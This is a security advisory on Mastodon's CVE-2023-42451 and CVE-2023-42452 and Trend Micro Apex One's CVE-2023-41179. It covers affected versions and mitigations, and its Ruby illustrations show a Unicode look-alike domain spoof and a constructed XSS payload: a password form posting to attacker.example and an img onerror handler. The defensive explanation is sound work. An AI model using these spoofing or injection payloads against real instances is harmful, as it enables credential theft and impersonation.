Mastodon has released fixes for two vulnerabilities, CVE-2023-42451 and CVE-2023-42452. Separately, Trend Micro has patched a zero-day, CVE-2023-41179, in its Apex One endpoint security product.
Urgent Zero-Day Vulnerability in TrendMicro Apex One: CVE-2023-41179
CVE-2023-41179 is rated critical (CVSS 9.1), and Trend Micro reports that it has been exploited in the wild to execute arbitrary code on affected installations.
The CVE-2023-41179 vulnerability impacts the following products:
- Trend Micro Apex One 2019
- Trend Micro Apex One SaaS 2019
- Worry-Free Business Security 10.0 SP1
- Worry-Free Business Security Services 10.0 SP1
CVE-2023-41179 lies in a third-party antivirus uninstaller module that ships with Apex One (both the on-premises and the SaaS edition) and with Worry-Free Business Security and Worry-Free Business Security Services.
An attacker who has already obtained access to the product's administrative console can abuse this module to execute arbitrary commands on the affected host, which is why restricting console access is the key interim control.
If you cannot apply the updates right away, restrict access to the administration console: allow connections only from trusted networks (an allowlist enforced at the host firewall or the network perimeter) and review who holds console credentials, since the exploit path starts from the console.
Vulnerabilities in Mastodon: CVE-2023-42451, CVE-2023-42452
Mastodon is an open-source, federated social network made up of independently operated servers (instances), with a post model resembling Twitter (X). It has attracted a sizeable part of the security community as an alternative to Twitter.
Mastodon has now fixed two notable vulnerabilities, CVE-2023-42451 and CVE-2023-42452, which allow domain spoofing and cross-site scripting (XSS) respectively. Further details on each are given below:
CVE-2023-42451 (CVSS: 7.4, High Severity):
This vulnerability affects versions earlier than 3.5.14, 4.0.10, 4.1.8, and 4.2.0-rc2. Under certain circumstances an attacker can exploit a flaw in domain name normalization (the conversion of a hostname to its canonical form) to spoof domains they do not own. In a federated network that is serious: the domain is what ties an actor or post to a particular server, so a spoofed domain lets content or identities appear to originate from another instance.
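The following Ruby snippet is an added illustration of the bug class behind CVE-2023-42451, not Mastodon's code and not the specific flaw that was patched: a hostname comparison that runs Unicode compatibility normalization (NFKC) before comparing will treat look-alike code points as equal to ASCII letters, so a domain the attacker controls compares equal to one they do not own. `LOCAL_DOMAIN`, `lax_normalize`, `strict_normalize` and `local_domain?` are all constructed for this example.

```ruby
# Added illustration of the domain-normalization pitfall behind CVE-2023-42451.
# This is NOT Mastodon's code; LOCAL_DOMAIN and the two normalizers are
# constructed for the example.
LOCAL_DOMAIN = 'mastodon.example'.freeze

# Lax normalizer: NFKC compatibility folding turns look-alike code points such
# as "ⓜ" (U+24DC) or fullwidth "ｍ" (U+FF4D) into plain ASCII before comparing,
# so a hostname the attacker registered collapses onto one they do not own.
def lax_normalize(host)
  host.unicode_normalize(:nfkc).downcase
end

# Strict normalizer: ASCII only, case-folded, and the result must be a valid
# hostname (LDH labels; IDNA A-labels such as "xn--mnchen-3ya" pass unchanged).
# Anything non-ASCII is rejected instead of being silently folded.
HOSTNAME_RE = /\A(?=.{1,253}\z)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\z/

def strict_normalize(host)
  raise ArgumentError, "non-ASCII hostname: #{host.inspect}" unless host.ascii_only?

  h = host.downcase
  raise ArgumentError, "malformed hostname: #{host.inspect}" unless HOSTNAME_RE.match?(h)

  h
end

# A typical consumer of the normalizer: "does this actor/URI belong to our own
# instance?". With the lax normalizer the spoofed host answers "yes".
def local_domain?(host, normalizer)
  normalizer.call(host) == LOCAL_DOMAIN
rescue ArgumentError
  false
end

if __FILE__ == $PROGRAM_NAME
  spoof = "\u24DCastodon.example" # "ⓜastodon.example": not a domain we own
  puts "lax:    #{local_domain?(spoof, method(:lax_normalize))}"    # true  (spoofed)
  puts "strict: #{local_domain?(spoof, method(:strict_normalize))}" # false (rejected)
end
```

The general rule: convert internationalized hostnames to their IDNA ASCII form once, at the edge, with a proper IDNA library, and afterwards compare only the ASCII form; never apply generic Unicode normalization to a hostname right before a security comparison.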
CVE-2023-42452 (CVSS: 6.1, Medium Severity):
This vulnerability affects versions 4.0.0 and later, prior to 4.0.10, 4.1.8, and 4.2.0-rc2 (the 3.5 branch is not affected). A flaw in the translation feature lets an attacker bypass server-side HTML sanitization, so HTML returned by the translation is rendered unescaped in the user's browser. Successful exploitation requires a user to click the "Translate" button on a malicious post.
The NVD notes that Mastodon's Content Security Policy (CSP) blocks inline scripts, which limits the impact. That mitigation only covers script execution, though: injected HTML that needs no JavaScript, such as a fake login form posting to an attacker's server, deceptive links, or spoofed post content, still renders, so the server-side sanitizer, not the CSP, is the real control here.
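The Ruby snippet below is an added illustration of the CVE-2023-42452 bug class, not Mastodon's code: HTML coming back from the translation path must pass through the same server-side sanitizer as any other status content before it reaches the client. The sanitizer is a deliberately small allowlist stand-in (Mastodon's real one is built on the `sanitize` gem and a full HTML parser), and `TRANSLATION_RESPONSE`, `render_translation_vulnerable` and `render_translation_fixed` are constructed for the example.

```ruby
require 'cgi'

# Added illustration for CVE-2023-42452's bug class. The sanitizer is a minimal
# allowlist stand-in, NOT Mastodon's; the translation response is constructed.
ALLOWED_TAGS = %w[p br a strong em].freeze
ALLOWED_HREF = %r{\Ahttps?://}i
TAG_RE       = %r{<(/?)([a-z][a-z0-9]*)([^>]*)>}i

# Escape a text run; unescape first so existing entities are not double-encoded.
def escape_text(text)
  CGI.escapeHTML(CGI.unescapeHTML(text))
end

# Rebuild an allowed tag from scratch, keeping only the attributes we understand
# (for <a>, an http/https href; everything else, including event handlers, is dropped).
def rebuild_tag(closing, tag, attrs)
  return "</#{tag}>" unless closing.empty?
  return "<#{tag}>" unless tag == 'a'

  href = attrs[/\bhref\s*=\s*["']([^"']*)["']/i, 1]
  return '<a>' unless href && ALLOWED_HREF.match?(href)

  %(<a href="#{CGI.escapeHTML(href)}" rel="nofollow noopener">)
end

# Allowlist sanitizer: every tag not on the list is emitted as escaped text,
# so <form>, <input>, <img onerror=...> and <script> all become inert.
def sanitize_fragment(html)
  out = +''
  pos = 0
  while (m = TAG_RE.match(html, pos))
    out << escape_text(html[pos...m.begin(0)])
    closing, tag, attrs = m[1], m[2].downcase, m[3]
    out << (ALLOWED_TAGS.include?(tag) ? rebuild_tag(closing, tag, attrs) : escape_text(m[0]))
    pos = m.end(0)
  end
  out << escape_text(html[pos..])
end

# Constructed: what an untrusted translation backend handed back for a post.
# The <form> needs no JavaScript, so a CSP that blocks inline scripts does not stop it.
TRANSLATION_RESPONSE = '<p>Hola</p>' \
  '<form action="https://attacker.example/steal"><input name="password"></form>' \
  '<img src=x onerror="alert(1)">'

# Before the fix: translated HTML is sent to the client exactly as returned.
def render_translation_vulnerable(translated)
  translated
end

# After the fix: translated HTML is sanitized like any other status content.
def render_translation_fixed(translated)
  sanitize_fragment(translated)
end

if __FILE__ == $PROGRAM_NAME
  puts render_translation_vulnerable(TRANSLATION_RESPONSE)
  puts render_translation_fixed(TRANSLATION_RESPONSE)
end
```

In the vulnerable path the phishing form and the `onerror` handler reach the browser; the CSP stops the handler but not the form. In the fixed path both are escaped into visible text. In production, use a parser-based sanitizer rather than the regex tokenizer shown here, and apply it to every content path that ends in `dangerouslySetInnerHTML` or its equivalent, not just the one that renders original posts.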
To protect against CVE-2023-42451 and CVE-2023-42452, upgrade to the patched release of the branch you run: 3.5.14, 4.0.10, 4.1.8, or 4.2.0-rc2. Additional details on the fixes are in the release notes in the GitHub changelog.